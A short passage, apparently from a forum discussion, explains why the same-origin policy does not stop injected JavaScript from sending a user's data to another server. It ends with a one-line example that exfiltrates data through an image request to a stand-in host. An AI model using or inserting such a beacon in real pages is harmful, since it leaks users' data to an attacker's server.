At that point the attacker can use that JavaScript to send your user's data to another server under their control, same origin won't help, as the JavaScript will appear to come from your site.
How? SOP isn't related to the code. It is only concerned with the page address.
(new Image()).src = 'https://example.com/data.php?payload=' + JSON.stringify(data);